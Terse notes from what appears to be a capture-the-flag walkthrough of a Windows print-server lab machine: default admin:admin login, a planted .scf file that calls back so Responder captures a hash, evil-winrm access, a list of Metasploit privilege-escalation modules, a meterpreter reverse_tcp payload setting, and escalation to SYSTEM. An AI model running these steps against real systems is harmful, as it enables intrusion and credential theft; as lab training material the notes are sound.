Web page requires a login, and admin:admin works and it looks like we can upload firmware to a printer.




We create a fsociety.scf which essentially just calls back to our machine and allows responder to capture a hash


responder -I tun0



we can then use evil-winrm to get onto the machine



LocalAccountTokenFilterPolicy set to 1



1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
2   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
3   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
4   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
5   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
6   exploit/windows/local/ricoh_driver_privesc                     Yes                      The target appears to be vulnerable. Ricoh driver directory has full permissions
7   exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.


set payload windows/x64/meterpreter/reverse_tcp


Folder: C:\Users\All Users\MySQL\MySQL Server 5.5\data\mysql
Folder: C:\Program Files\MySQL

In the powershell history we see something odd

Looking up the printer and version we can see there is a local priv esc exploit and a module in metasploit



I spent multiple hours trying everything I could manually and in metasploit and eventually looked at the walkthrough

Migrating our process to explorer.exe fixes the issue

We run the exploit and we are root